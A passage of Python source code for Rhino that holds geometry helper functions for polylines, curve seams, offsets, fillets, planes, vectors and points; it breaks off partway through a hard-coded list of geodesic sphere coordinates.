    directions = [rs.VectorCreate(rs.CurveEndPoint(s), rs.CurveStartPoint(s))
                  for s in segments]
    count = len(directions)
    concave = []
    for i in range(count):
        turn = rs.VectorCrossProduct(directions[i], directions[(i + 1) % count])
        # negative projection on the curve normal marks a concave corner
        if rs.VectorDotProduct(turn, normal) < -0.0000001:
            concave.append(rs.CurveEndPoint(segments[i]))
    return concave
@staticmethod
def curve_convex_points(curve):
    """Return the vertices of a closed polyline whose corners are convex."""
    segments = rs.ExplodeCurves(curve)
    normal = rs.CurveNormal(curve)
    directions = [rs.VectorCreate(rs.CurveEndPoint(s), rs.CurveStartPoint(s))
                  for s in segments]
    count = len(directions)
    convex = []
    for i in range(count):
        turn = rs.VectorCrossProduct(directions[i], directions[(i + 1) % count])
        # positive projection on the curve normal marks a convex corner
        if rs.VectorDotProduct(turn, normal) > 0.0000001:
            convex.append(rs.CurveEndPoint(segments[i]))
    return convex
@staticmethod
def corner_analysis(curve, mode = 0):
    """Analyse the corners of a closed polyline.

    mode: -1 = concave corners only, 1 = convex only, 0 = both.
    Returns [points, bisectors, angles, ids] for every retained corner.
    """
    tol = 0.0000001
    normal = rs.CurveNormal(curve)
    segments = rs.ExplodeCurves(curve)
    unit = []
    for s in segments:
        direction = rs.VectorCreate(rs.CurveEndPoint(s), rs.CurveStartPoint(s))
        unit.append(rs.VectorUnitize(direction))
    points, bisectors, angles, ids = [], [], [], []
    count = len(unit)
    for i in range(count):
        nxt = unit[(i + 1) % count]
        # sign of the cross product projected on the normal tells
        # concave (< 0) from convex (> 0) corners
        dot = rs.VectorDotProduct(rs.VectorCrossProduct(unit[i], nxt), normal)
        if mode == -1:
            keep = dot < -tol
        elif mode == 1:
            keep = dot > tol
        else:
            keep = dot < -tol or dot > tol
        if keep:
            points.append(rs.CurveEndPoint(segments[i]))
            bisectors.append(rs.VectorUnitize(rs.VectorAdd(unit[i], -nxt)))
            opening = rs.VectorAngle(unit[i], -nxt)
            # report the smaller of the two possible corner angles
            angles.append(min(abs(opening), abs(360 - opening)))
            ids.append(i)
    return [points, bisectors, angles, ids]
@staticmethod
def insert_curves(base_curve, curves_to_insert, seam=None, tolerance = 0.1):
    """Splice a set of curves into a closed base curve.

    The base curve is split at the endpoints of every curve to insert;
    the split pieces alternate between two candidate sets, and the set
    that joins best with the inserted curves wins. Optionally relocates
    the seam to `seam`. Returns a single Rhino curve, or falls back to
    the first inserted curve when joining cannot produce one.
    """
    base_curve = copy.deepcopy(base_curve)
    curves_to_insert = copy.deepcopy(curves_to_insert)
    # base-curve parameters at both ends of each curve to insert
    points = []
    for i in range(len(curves_to_insert)):
        points.append(rs.CurveClosestPoint(base_curve, rs.CurveStartPoint(curves_to_insert[i])))
        points.append(rs.CurveClosestPoint(base_curve, rs.CurveEndPoint(curves_to_insert[i])))
    # BUG FIX: the original called sorted(points) and discarded the result,
    # leaving the split parameters unsorted; sort in place instead.
    points.sort()
    # split curve at the collected parameters
    base_curve = rs.coercecurve(base_curve)
    split = rg.Curve.Split(base_curve, points)
    # 2 possible ways of trimming the curve: keep even or odd pieces
    trim_A = []
    trim_B = []
    for j in range(len(split)):
        if j % 2 == 0:
            trim_A.append(split[j])
        else:
            trim_B.append(split[j])
    # join each candidate set with the curves to insert
    for j in range(len(curves_to_insert)):
        curves_to_insert[j] = rs.coercecurve(curves_to_insert[j])
    result_A = rg.Curve.JoinCurves(curves_to_insert + trim_A, tolerance)
    result_B = rg.Curve.JoinCurves(curves_to_insert + trim_B, tolerance)
    if len(curves_to_insert) > 1:
        # several inserts: best result is the most unified polyline
        if len(result_A) < len(result_B):
            result = result_A
        else:
            result = result_B
    else:
        # single insert: best result is the longest curve
        if rg.Curve.GetLength(result_A[0]) > rg.Curve.GetLength(result_B[0]):
            result = result_A
        else:
            result = result_B
    if len(result) > 1:
        # joining failed to output a single polyline; fall back to the insert
        return curves_to_insert[0]
    else:
        final_curve = result[0]
        final_curve = scriptcontext.doc.Objects.Add(final_curve)
        if seam != None:
            Toolbox.Curves.curve_seam(final_curve, seam)
            final_curve = rs.coercecurve(final_curve)
            final_curve = Toolbox.Curves.resimplify_Curve(final_curve)
        else:
            final_curve = rs.coercecurve(final_curve)
        return final_curve
@staticmethod
def curve_seam(curve, point):
    """Move the seam of a closed curve to the location closest to `point`."""
    parameter = rs.CurveClosestPoint(curve, point)
    return rs.CurveSeam(curve, parameter)
@staticmethod
def curve_difference(base_curve, trim_curve):
    """Trim a closed curve with another curve and keep the piece farthest from the cut.

    NOTE(review): assumes trim_curve crosses the planar surface bounded by
    base_curve in exactly one intersection segment - confirm with callers.
    """
    # trim a curve using a surface
    base_surface = rs.coercebrep(rs.AddPlanarSrf(base_curve))
    base_curve = rs.coercecurve(base_curve)
    # intersection segment between the trimming curve and the planar surface
    line = rg.Intersect.Intersection.CurveBrep(trim_curve, base_surface, 0.001)[1][0]
    p1 = line.PointAtStart
    p2 = line.PointAtEnd
    # base-curve parameters nearest to both ends of the cut
    param1 = round(rg.Curve.ClosestPoint(base_curve,p1)[1],6)
    param2 = round(rg.Curve.ClosestPoint(base_curve,p2)[1],6)
    if param2 < param1 : param1, param2 = param2, param1
    # candidate 1: the piece between the two parameters
    trim1 = rg.Curve.Trim(copy.deepcopy(base_curve), param1, param2)
    # candidate 2: the complementary piece (two ends joined across the seam)
    trim2A = rg.Curve.Trim(copy.deepcopy(base_curve), base_curve.Domain[0], param1)
    trim2B = rg.Curve.Trim(copy.deepcopy(base_curve), param2, base_curve.Domain[1])
    trim2 = rg.Curve.JoinCurves([trim2A,trim2B])[0]
    # keep the candidate whose closest point is farther from the cut midpoint
    mid = rs.coerce3dpoint(Toolbox.Points.average_point([p1,p2]))
    d1 = rg.Curve.PointAt(trim1,rg.Curve.ClosestPoint(trim1,mid)[1])
    d2 = rg.Curve.PointAt(trim2,rg.Curve.ClosestPoint(trim2,mid)[1])
    dist1 = rs.Distance(d1, mid)
    dist2 = rs.Distance(d2, mid)
    if dist1 > dist2: result = trim1
    else: result = trim2
    return result
@staticmethod
def curve_closest_point(curve, point):
    """Return the point on `curve` closest to `point`."""
    parameter = rs.CurveClosestPoint(curve, point)
    return rs.EvaluateCurve(curve, parameter)
@staticmethod
def offset(closed_curve, distance):
    """Offset a closed curve relative to its area centroid; zero distance is a no-op."""
    if distance == 0:
        return closed_curve
    centroid = rs.CurveAreaCentroid(closed_curve)[0]
    return rs.OffsetCurve(closed_curve, centroid, distance)[0]
@staticmethod #WIP
def fill(closed_curve, distance, border=False):
    """Fill the inside of a closed curve with a spiral of concentric offsets.

    distance: spacing between successive offsets (the input curve is
    returned unchanged when distance <= 0). border=True first shrinks
    the boundary by one offset so the fill stays inside it.
    """
    if distance > 0 :
        if border is True:
            closed_curve = Toolbox.Curves.offset(closed_curve, -distance)
        curves = []
        # at most 7 concentric offsets; stop early when offsetting fails
        for i in range(7) :
            try:
                curve = Toolbox.Curves.offset(closed_curve, distance*(i+1))
                curve = Toolbox.Curves.open_closed_curve(curve)
                if i > 0:
                    # offsets should shrink; a longer curve means the offset flipped outward
                    if rs.CurveLength(curve) > rs.CurveLength(curves[i-1]): break
                    # connect this ring to the previous one so they join into one spiral
                    link = rs.AddLine(rs.CurveEndPoint(curves[i-1]),rs.CurveStartPoint(curve))
                    curves.append(rs.JoinCurves([curve, link])[0])
                else: curves.append(curve)
            except: break  # NOTE(review): best-effort - silently stops on any offset failure
        if len(curves) > 1 :
            return rs.JoinCurves(curves)[0]
        else : return curves[0]
    else : return closed_curve
@staticmethod
def open_closed_curve(curve):
    """Turn a closed curve into an open one by trimming a tiny piece before the seam."""
    gap = 0.000001 / rs.CurveLength(curve)
    end_parameter = rs.CurveParameter(curve, 1 - gap)
    return rs.AddSubCrv(curve, 0, end_parameter)
@staticmethod
def close_open_curve(curve):
    """Close an open curve with a straight segment between its endpoints."""
    if rs.IsCurveClosed(curve):
        return curve
    closer = rs.AddLine(rs.CurveStartPoint(curve), rs.CurveEndPoint(curve))
    joined = rg.Curve.JoinCurves([rs.coercecurve(closer), rs.coercecurve(curve)])
    return joined[0]
@staticmethod
def sort_curves_by_length(curves):
    """Return [curve, length] pairs sorted by increasing curve length."""
    pairs = [[crv, rs.CurveLength(crv)] for crv in curves]
    return sorted(pairs, key=lambda pair: pair[1])
@staticmethod
def align_curve_direction(guide, curve):
    """Flip `curve` in place when its direction does not match `guide`."""
    if not rs.CurveDirectionsMatch(curve, guide):
        # Rhino geometry reverses in place; fall back to the document API
        try:
            rg.Curve.Reverse(curve)
        except:
            rs.ReverseCurve(curve)
    return curve
@staticmethod
def align_curve_direction_2(guide, curve, n = 10):
    '''Flip curve comparing the angular difference between n tangents on both curves'''
    reversed_copy = rg.Curve.Duplicate(curve)
    rg.Curve.Reverse(reversed_copy)
    guide_params = rg.Curve.DivideByCount(guide, n, True)
    curve_params = rg.Curve.DivideByCount(curve, n, True)
    rev_params = rg.Curve.DivideByCount(reversed_copy, n, True)
    forward_total = 0
    backward_total = 0
    for i in range(n):
        guide_tan = rg.Curve.TangentAt(guide, guide_params[i])
        forward_total += rg.Vector3d.VectorAngle(guide_tan, rg.Curve.TangentAt(curve, curve_params[i]))
        backward_total += rg.Vector3d.VectorAngle(guide_tan, rg.Curve.TangentAt(reversed_copy, rev_params[i]))
    # reverse only when the reversed orientation tracks the guide better
    if forward_total > backward_total:
        rg.Curve.Reverse(curve)
    return curve
@staticmethod
def resimplify_Curve(curve):
    """Simplify the curve, trying each vertex as seam, keeping the seam with fewest vertices."""
    curve = scriptcontext.doc.Objects.Add(curve)
    vertices = rs.PolylineVertices(curve)
    best = curve
    fewest = len(vertices)
    for vertex in vertices:
        candidate = rs.CopyObject(curve)
        rs.CurveSeam(candidate, rs.CurveClosestPoint(candidate, vertex))
        rs.SimplifyCurve(candidate)
        vertex_count = len(rs.PolylineVertices(candidate))
        if vertex_count < fewest:
            best = rs.CopyObject(candidate)
            fewest = vertex_count
    return rs.coercecurve(best)
@staticmethod
def match_seams(curve1, curve2, simplify=True):
    """Match the seam of two closed polylines that have pairwise-parallel segments.

    Raises when the polylines have a different segment count or when no
    rotation of curve2's segments is parallel to curve1's.
    Returns [curve1, curve2] as Rhino curve geometry.
    """
    if simplify is True:
        curve1=Toolbox.Curves.resimplify_Curve(curve1)
        curve2=Toolbox.Curves.resimplify_Curve(curve2)
    curve2 = Toolbox.Curves.align_curve_direction(rs.coercecurve(curve1),rs.coercecurve(curve2))
    curve1=scriptcontext.doc.Objects.Add(curve1)
    curve2=scriptcontext.doc.Objects.Add(curve2)
    seg1 = rs.ExplodeCurves(curve1)
    seg2 = rs.ExplodeCurves(curve2)
    # drop zero-length segments left over from simplification
    seg1 = [seg for seg in seg1 if rs.CurveLength(seg)>0.00001]
    seg2 = [seg for seg in seg2 if rs.CurveLength(seg)>0.00001]
    # rebuild clean closed polylines from the remaining segment start points
    curve1 = rs.AddPolyline([rs.CurveStartPoint(seg) for seg in seg1]+[rs.CurveStartPoint(curve1)])
    curve2 = rs.AddPolyline([rs.CurveStartPoint(seg) for seg in seg2]+[rs.CurveStartPoint(curve2)])
    shift = None
    if len(seg1) == len(seg2):
        # find the rotation of seg2 that makes every segment parallel to seg1
        for i in range(len(seg2)):
            flag = True
            for j in range(len(seg1)):
                vec1 = Toolbox.Vectors.line_to_vec(seg2[(i+j)%len(seg2)])
                vec2 = Toolbox.Vectors.line_to_vec(seg1[j])
                if rs.IsVectorParallelTo(vec1,vec2) != 1:
                    flag = False
            if flag == True:
                shift = i
                break
    else: raise Exception("polylines have a different number of segments")
    if shift == None: raise Exception("polyline segments are not parallel")
    else:
        # move curve2's seam to the vertex that matches curve1's seam
        points = rs.PolylineVertices(curve2)
        Toolbox.Curves.curve_seam(curve2, points[shift])
        rs.coercecurve(curve2)
    curve1 = rs.coercecurve(curve1)
    curve2 = rs.coercecurve(curve2)
    return [curve1,curve2]
@staticmethod
def match_seams_old(curve1,curve2, simplify=True):
    """Match the seams of two curves (legacy distance-scoring version).

    Tries every vertex of curve2 as seam and keeps the one minimizing the
    total distance between corresponding vertices of the two curves.
    """
    if simplify is True:
        Toolbox.Curves.resimplify_Curve(curve1)
        Toolbox.Curves.resimplify_Curve(curve2)
    Toolbox.Curves.align_curve_direction(rs.coercecurve(curve1),rs.coercecurve(curve2))
    verts2 = rs.PolylineVertices(curve2)
    del verts2[-1]
    verts1 = rs.PolylineVertices(curve1)
    del verts1[-1]
    best_score = None
    for seam_vertex in verts2:
        candidate = rs.CopyObject(curve2)
        rs.CurveSeam(candidate, rs.CurveClosestPoint(candidate, seam_vertex))
        candidate_verts = rs.PolylineVertices(candidate)
        del candidate_verts[-1]
        # total vertex-to-vertex distance between the two polylines
        score = 0
        for a, b in zip(candidate_verts, verts1):
            score += rs.Distance(a, b)
        if best_score is None or score < best_score:
            curve2 = rs.CopyObject(candidate)
            best_score = score
    return [curve1, curve2]
@staticmethod
def get_spikes(curve, tolerance=0.0001):
    """Find degenerate 'spike' vertices of a polyline (neighbours nearly coincide)."""
    spikes = []
    vertices = rs.PolylineVertices(curve)
    del vertices[0]
    count = len(vertices)
    for i in range(count):
        # a spike exists where the two neighbours of a vertex almost touch
        if rs.Distance(vertices[i - 1], vertices[(i + 1) % count]) < tolerance:
            spikes.append(rs.AddLine(vertices[i - 1], vertices[i]))
    return spikes
@staticmethod
def create_polygon(plane, radius, sides=3):
    """Create a polygon inscribed in a circle of `radius` on `plane`.

    sides == 2 yields a degenerate doubled segment through the plane origin.
    """
    if sides == 2:
        start = rs.CopyObject(plane[0], -plane[1] * radius)
        end = rs.CopyObject(plane[0], plane[1] * radius)
        return rs.AddPolyline([start, end, plane[0]])
    if sides > 2:
        circle = rg.Circle(plane, radius)
        inscribed = rg.Polyline.CreateInscribedPolygon(circle, sides)
        edges = [rs.AddLine(inscribed[i], inscribed[i + 1])
                 for i in range(len(inscribed) - 1)]
        return rs.JoinCurves(edges)[0]
@staticmethod
def trapeze_to_rectangle(trapeze):
    """Build a rectangle from a trapeze by squaring off its two longest sides.

    The bases (two longest sides) of the trapeze have to be longer than the
    other sides and must be parallel to each other; otherwise an Exception
    is raised. Returns the rectangle as a closed polyline.
    """
    sorted_sides = Toolbox.Curves.sort_curves_by_length(rs.ExplodeCurves(trapeze))
    longest_side = sorted_sides[-1][0]
    second_side = sorted_sides[-2][0]
    # exception: sides not parallel
    if rs.IsVectorParallelTo(Toolbox.Vectors.line_to_vec(longest_side),Toolbox.Vectors.line_to_vec(second_side)) == 0:
        raise Exception('Longest sides are not parallel')
    # start with the extremities of the second longest side
    point1 = rs.CurveStartPoint(second_side)
    point2 = rs.CurveEndPoint(second_side)
    axis = rs.VectorCreate(point2, point1)
    # plane perpendicular to the bases at the first extremity
    plane1 = rs.PlaneFromNormal(point1, axis)
    if rs.PlaneCurveIntersection(plane1, longest_side):
        # the perpendicular hits the longest side: project point1 onto it
        pointA = point1
        pointB = rs.PlaneCurveIntersection(plane1, longest_side)[0][1]
    else:
        # otherwise project the longest side's end onto the second side
        # (unused point4/plane4 locals from the original removed)
        pointA = rs.CurveEndPoint(longest_side)
        plane3 = rs.PlaneFromNormal(pointA, axis)
        pointB = rs.PlaneCurveIntersection(plane3, second_side)[0][1]
    # same construction at the second extremity
    plane2 = rs.PlaneFromNormal(point2, axis)
    if rs.PlaneCurveIntersection(plane2, longest_side):
        pointC = point2
        pointD = rs.PlaneCurveIntersection(plane2, longest_side)[0][1]
    else:
        pointC = rs.CurveStartPoint(longest_side)
        plane3 = rs.PlaneFromNormal(pointC, axis)
        pointD = rs.PlaneCurveIntersection(plane3, second_side)[0][1]
    # solve crossing polyline exception: keep the vertex order that
    # does not self-intersect (the shorter outline)
    polyline = rs.AddPolyline([pointA,pointB,pointC,pointD, pointA])
    polyline_bis = rs.AddPolyline([pointA,pointB,pointD,pointC, pointA])
    if rs.CurveLength(polyline_bis) < rs.CurveLength(polyline):
        polyline = polyline_bis
    return polyline
@staticmethod
def insert_crossing_point(poly1, poly2):
    """intersect two polylines and add intersection points to the first polyline."""
    tolerance = 0.000001
    vertices = rs.PolylineVertices(poly1)
    events = rs.CurveCurveIntersection(poly1, poly2)
    # parameters of the existing vertices on poly1
    params = [rs.CurveClosestPoint(poly1, vertex) for vertex in vertices]
    for event in events:
        # skip intersection points that coincide with an existing vertex
        duplicate = False
        for vertex in vertices:
            if rs.Distance(vertex, event[1]) < tolerance:
                duplicate = True
        if not duplicate:
            params.append(rs.CurveClosestPoint(poly1, event[1]))
    # rebuild the polyline with all points in parameter order
    params = sorted(params)
    rebuilt = [rs.EvaluateCurve(poly1, t) for t in params]
    return rs.AddPolyline(rebuilt)
@staticmethod
def polyline_half_zones(poly):
    """
    Divide a polyline in two using the axis linking endpoints.
    Each piece is closed to shape a new polyline.
    The new polylines are split in two lists depending on their position to the axis.
    """
    # Axis creation
    line = rs.AddLine(rs.CurveEndPoint(poly), rs.CurveStartPoint(poly))
    # Add vertices at the intersection between the axis and the polyline
    poly = Toolbox.Curves.insert_crossing_point(poly, line)
    # Data
    base_vec = rs.VectorCreate(rs.CurveEndPoint(poly), rs.CurveStartPoint(poly))
    points = rs.PolylineVertices(poly)
    normal = rs.CurveNormal(poly)
    # orient the curve normal upwards so the Pos/Neg classification is stable
    if normal[2] < 0 : normal = rs.VectorReverse(normal)
    positive = []
    negative = []
    positive_points = []
    negative_points = []
    tempo = []  # vertices of the piece currently being collected
    tempo.append(rs.CurveStartPoint(poly))
    flag = 'Null'  # which side of the axis the current piece lies on
    for i in range(len(points)-1):
        # Use cross product to determine the position of the point in relation to the axis
        test_vec = rs.VectorCreate(points[i+1], rs.CurveStartPoint(poly))
        angle = rs.VectorAngle(base_vec, test_vec)
        if angle > 0.01:
            cross = rs.VectorUnitize(rs.VectorCrossProduct(base_vec, test_vec))
        else: cross = None
        # When the point is on the axis, close the polyline and initialize a new one
        if cross == None:
            tempo.append(points[i+1])
            tempo.append(tempo[0])
            if flag == 'Pos': positive_points.append(tempo)
            if flag == 'Neg': negative_points.append(tempo)
            tempo = []
            flag = 'Null'
        # Change the flag value depending of the crossproduct result
        elif rs.IsVectorParallelTo(cross, normal) == 1 :
            flag = 'Pos'
        elif rs.IsVectorParallelTo(cross, normal) == -1 :
            flag = 'Neg'
        else: raise Exception('Cross Product in Polyline half-zone got an unexpected result')
        # Add this point to the temporary list (starts the next piece after a close)
        tempo.append(points[i+1])
    # Create polylines
    if positive_points != []:
        for i in range(len(positive_points)):
            positive.append(rs.AddPolyline(positive_points[i]))
    if negative_points != []:
        for i in range(len(negative_points)):
            negative.append(rs.AddPolyline(negative_points[i]))
    return positive, negative
@staticmethod
def fillet_curves(c1, c2, radius, join=True):
    """Fillet two curves at their closest pair of endpoints."""
    c1 = rs.coercecurve(c1)
    c2 = rs.coercecurve(c2)
    start1, end1 = rs.CurveStartPoint(c1), rs.CurveEndPoint(c1)
    start2, end2 = rs.CurveStartPoint(c2), rs.CurveEndPoint(c2)
    d1 = rs.Distance(start1, start2)
    d2 = rs.Distance(end1, start2)
    d3 = rs.Distance(end1, end2)
    d4 = rs.Distance(start1, end2)
    # pick the endpoint pair with the smallest separation
    p1, p2 = start1, start2
    if d2 < d1:
        p1, p2 = end1, start2
    if d3 < d2 and d3 < d1:
        p1, p2 = end1, end2
    if d4 < d3 and d4 < d2 and d4 < d1:
        p1, p2 = start1, end2
    return rg.Curve.CreateFilletCurves(c1, p1, c2, p2, radius, join, join, join, 0.001, 0.001)[0]
@staticmethod
def connect_curves(c1,c2):
    """Join two curves into one loop by linking their matching endpoints."""
    start_to_start = rs.Distance(rs.CurveStartPoint(c1), rs.CurveStartPoint(c2))
    start_to_end = rs.Distance(rs.CurveStartPoint(c1), rs.CurveEndPoint(c2))
    # link whichever endpoint pairing is closer
    if start_to_start < start_to_end:
        link1 = rs.AddLine(rs.CurveStartPoint(c1), rs.CurveStartPoint(c2))
        link2 = rs.AddLine(rs.CurveEndPoint(c1), rs.CurveEndPoint(c2))
    else:
        link1 = rs.AddLine(rs.CurveStartPoint(c1), rs.CurveEndPoint(c2))
        link2 = rs.AddLine(rs.CurveEndPoint(c1), rs.CurveStartPoint(c2))
    return rs.JoinCurves([c1, link1, c2, link2])[0]
@staticmethod
def trim_curve_with_curve(curve,cutter):
    """Split `curve` at its first intersection with `cutter` and keep the first piece."""
    events = rg.Intersect.Intersection.CurveCurve(curve, cutter, 0.001, 0.001)
    param = events.Item[0].ParameterA
    return rg.Curve.Split(curve, param)[0]
@staticmethod
def isSharingEdge(curve1, curve2):
    """Return True when the two polylines overlap along at least one edge."""
    flag = False
    segmentsX = rs.ExplodeCurves(curve1)
    segmentsY = rs.ExplodeCurves(curve2)
    for segX in segmentsX:
        for segY in segmentsY:
            # parallelism: 1 = same direction, -1 = opposite, 0 = not parallel
            parallel = rs.IsVectorParallelTo(Toolbox.Vectors.line_to_vec(segX),Toolbox.Vectors.line_to_vec(segY))
            isColinear = rs.Distance(rs.LineClosestPoint(segX, rs.CurveStartPoint(segY)),rs.CurveStartPoint(segY)) < 0.001
            if parallel != 0 and isColinear:
                # BUG FIX: the original compared the boolean (isParallel != 0)
                # against -1, so anti-parallel segments were never reversed;
                # also rs.ReverseCurve returns a success flag, so assigning it
                # back to segY would clobber the curve id.
                if parallel == -1:
                    rs.ReverseCurve(segY)
                d1 = rs.Distance(rs.CurveStartPoint(segX), rs.CurveStartPoint(segY))
                d2 = rs.Distance(rs.CurveEndPoint(segX), rs.CurveEndPoint(segY))
                d3 = rs.Distance(rs.CurveStartPoint(segX), rs.CurveEndPoint(segY))
                d4 = rs.Distance(rs.CurveEndPoint(segX), rs.CurveStartPoint(segY))
                l1 = rs.CurveLength(segY)
                l2 = rs.CurveLength(segX)
                # overlap test: endpoints of one segment fall within the other
                if ((d1 <= l1) and (d3 <= l1)) or ((d2 <= l1) and (d4 <= l1)): flag = True
                if ((d1 <= l2) and (d4 <= l2)) or ((d2 <= l2) and (d3 <= l2)): flag = True
    return flag
@staticmethod
def bezier(points, t):
    """Evaluate the Bezier curve of the control `points` at parameter t in [0, 1].

    Uses De Casteljau's algorithm: repeatedly interpolate between consecutive
    control points until a single point remains, which is returned.
    """
    # (the original also accumulated every construction line in an unused
    # `lines` list, leaking geometry into the document; removed)
    while len(points) > 1:
        interpolated = []
        for i in range(len(points) - 1):
            segment = rs.AddLine(points[i], points[i + 1])
            domain_end = rs.CurveDomain(segment)[1]
            interpolated.append(rs.EvaluateCurve(segment, t * domain_end))
        points = interpolated
    return points[0]
class Planes:
    @staticmethod
    def is_plane_in_plane(plane1, plane2):
        """Check whether two planes are parallel and coplanar."""
        # normals must be parallel (in either direction)
        if abs(rs.IsVectorParallelTo(plane1.ZAxis, plane2.ZAxis)) != 1:
            return False
        # trivial case where origins are the same
        if rs.Distance(plane1.Origin, plane2.Origin) < 0.00001:
            return True
        # otherwise the origin-to-origin translation must lie in the plane
        shift = rs.VectorUnitize(rs.VectorCreate(plane2.Origin, plane1.Origin))
        witness = rs.VectorCrossProduct(shift, plane1.XAxis)
        if abs(rs.IsVectorParallelTo(witness, plane1.ZAxis)) == 1:
            return True
        if str(Toolbox.Vectors.round_vector(witness, 6)) == '0,0,0':
            return True
        return False

    @staticmethod
    def orient(object, ref, target):
        """Transform an object from a reference plane to a target plane."""
        mapping = rg.Transform.PlaneToPlane(ref, target)
        return scriptcontext.doc.Objects.Transform(object, mapping, False)

    @staticmethod
    def three_planes_intersection(p1, p2, p3):
        """intersect three planes to get a point. Planes should not be parallel!"""
        fold = rs.PlanePlaneIntersection(p1, p2)
        return rs.LinePlaneIntersection(fold, p3)
class Vectors:
    @staticmethod
    def average_vector(vectors, cull_dup=False):
        """Average a list of vectors, optionally removing duplicates first."""
        if cull_dup == True:
            vectors = Toolbox.Vectors.cull_dup(vectors)
        count = len(vectors)
        sx = 0
        sy = 0
        sz = 0
        for vec in vectors:
            sx += vec[0]
            sy += vec[1]
            sz += vec[2]
        return rs.VectorCreate((sx / count, sy / count, sz / count), (0, 0, 0))

    @staticmethod
    def cull_dup(vectors):
        """Remove duplicate vectors (compared after rounding to 6 decimals)."""
        unique_vec = []
        for i in range(len(vectors)):
            rounded = Toolbox.Vectors.round_vector(vectors[i], n=6)
            duplicate = False
            for j in range(i):
                if rounded == Toolbox.Vectors.round_vector(vectors[j], n=6):
                    duplicate = True
            if not duplicate:
                unique_vec.append(vectors[i])
        return unique_vec

    @staticmethod
    def project_vector_to_plane(vector, plane):
        """Project a vector onto a plane by projecting a line onto a disk."""
        center = plane.Origin
        line = rs.AddLine(center, rs.CopyObject(center, vector))
        disk = rs.AddPlanarSrf(rs.AddCircle(plane, 2 * rs.VectorLength(vector)))
        direction = -rs.SurfaceNormal(disk, [0, 0])
        rounded_vec = Toolbox.Vectors.round_vector(vector, 6)
        rounded_dir = Toolbox.Vectors.round_vector(direction, 6)
        # a vector (anti)parallel to the disk normal cannot be projected
        if rounded_vec == rounded_dir or rounded_vec == -rounded_dir:
            return vector
        projection = rs.ProjectCurveToSurface(line, disk, direction)
        return rs.VectorUnitize(rs.VectorCreate(rs.CurveEndPoint(projection), rs.CurveStartPoint(projection)))

    @staticmethod
    def line_to_vec(line, unitize=False):
        """get a vector from a line"""
        vec = rs.VectorCreate(rs.CurveEndPoint(line), rs.CurveStartPoint(line))
        return rs.VectorUnitize(vec) if unitize is True else vec

    @staticmethod
    def is_vector_outward(center, vector_location, vector):
        """Check if a vector points toward a center point (False) or outward (True)."""
        probe = rs.CopyObject(vector_location, rs.VectorUnitize(vector) * 0.01)
        before = rs.Distance(center, vector_location)
        after = rs.Distance(center, probe)
        if after < before:
            return False
        if after > before:
            return True
        raise Exception("is_vector_outward cannot compute because vector is tangent to circle")

    @staticmethod
    def round_vector(vector, n=6):
        """round x,y,z components of a vector to n decimals"""
        rounded = copy.deepcopy(vector)
        for axis in range(len(rounded)):
            rounded[axis] = round(rounded[axis], n)
        return rounded

    @staticmethod
    def cross(a, b):
        """simple cross product between two vectors"""
        return [a[1] * b[2] - a[2] * b[1],
                a[2] * b[0] - a[0] * b[2],
                a[0] * b[1] - a[1] * b[0]]

    @staticmethod
    def isvectornull(vector):
        """check if a vector is null or close to (0,0,0)"""
        for component in vector:
            if Toolbox.Numbers.isclose(component, 0, rel_tol=1e-06, abs_tol=1e-06) is False:
                return False
        return True
class Points:
@staticmethod
def point_closest_point(point, points):
    """Return the point of the list which is closest to the given point."""
    candidate = None
    shortest = None
    for other in points:
        gap = rs.Distance(point, other)
        if shortest is None or gap < shortest:
            shortest = gap
            candidate = other
    return candidate
@staticmethod
def average_point(points):
    """average a list of points"""
    count = len(points)
    sx = 0
    sy = 0
    sz = 0
    for pt in points:
        sx += pt[0]
        sy += pt[1]
        sz += pt[2]
    return rs.AddPoint(sx / count, sy / count, sz / count)
@staticmethod
def project_point_to_plane(point, plane, direction):
    """Project a point onto a plane along a direction vector."""
    ray = [rs.CopyObject(point, direction), point]
    return rs.LinePlaneIntersection(ray, plane)
@staticmethod
def geodesic_sphere_points():
points = [[-0.850650787354,-0.525731086731,0.0],
[0.850650787354,-0.525731086731,0.0],
[-0.850650787354,0.525731086731,0.0],
[0.850650787354,0.525731086731,0.0],
[0.0,-0.850650787354,-0.525731086731],
[0.0,0.850650787354,-0.525731086731],
[0.0,-0.850650787354,0.525731086731],
[0.0,0.850650787354,0.525731086731],
[-0.525731086731,0.0,-0.850650787354],
[-0.525731086731,0.0,0.850650787354],
[0.525731086731,0.0,-0.850650787354],
[0.525731086731,0.0,0.850650787354],
[-0.5,-0.809017002583,0.309017002583],
[0.0,-1.0,0.0],
[-0.5,-0.809017002583,-0.309017002583],
[-0.309017002583,-0.5,0.809017002583],
[-0.5,-0.809017002583,0.309017002583],
[-0.809017002583,-0.309017002583,0.5],
[-0.309017002583,-0.5,0.809017002583],
[0.0,0.0,1.0],
[0.309017002583,-0.5,0.809017002583],
[0.309017002583,-0.5,0.809017002583],
[0.809017002583,-0.309017002583,0.5],
[0.5,-0.809017002583,0.309017002583],
[0.5,-0.809017002583,-0.309017002583],
[0.0,-1.0,0.0],
[0.5,-0.809017002583,0.309017002583],
[-0.5,-0.809017002583,-0.309017002583],
[-0.309017002583,-0.5,-0.809017002583],
[-0.809017002583,-0.309017002583,-0.5],
[0.5,-0.809017002583,-0.309017002583],
[0.809017002583,-0.309017002583,-0.5],
[0.309017002583,-0.5,-0.809017002583],
[0.0,0.0,-1.0],
[-0.309017002583,-0.5,-0.809017002583],
[0.309017002583,-0.5,-0.809017002583],
[-1.0,0.0,0.0],
[-0.809017002583,0.309017002583,-0.5],
[-0.809017002583,-0.309017002583,-0.5],
[-0.5,0.809017002583,-0.309017002583],
[-0.309017002583,0.5,-0.809017002583],
[-0.809017002583,0.309017002583,-0.5],
[0.0,0.0,-1.0],
[-0.309017002583,0.5,-0.809017002583],
[0.309017002583,0.5,-0.809017002583],
[0.309017002583,0.5,-0.809017002583],
[0.5,0.809017002583,-0.309017002583],
[0.809017002583,0.309017002583,-0.5],
[0.5,0.809017002583,-0.309017002583],
[0.0,1.0,0.0],
[0.5,0.809017002583,0.309017002583],
[0.5,0.809017002583,0.309017002583],
[0.309017002583,0.5,0.809017002583],
[0.809017002583,0.309017002583,0.5],
[1.0,0.0,0.0],
[0.809017002583,0.309017002583,0.5],
[0.809017002583,-0.309017002583,0.5],
[-0.809017002583,0.309017002583,0.5],
[-1.0,0.0,0.0],
[-0.809017002583,-0.309017002583,0.5],
[-0.309017002583,0.5,0.809017002583],
[-0.5,0.809017002583,0.309017002583],
[-0.809017002583,0.309017002583,0.5],
[-0.309017002583,0.5,0.809017002583],
[0.0,0.0,1.0],
[0.309017002583,0.5,0.809017002583],
[-0.5,0.809017002583,-0.309017002583],
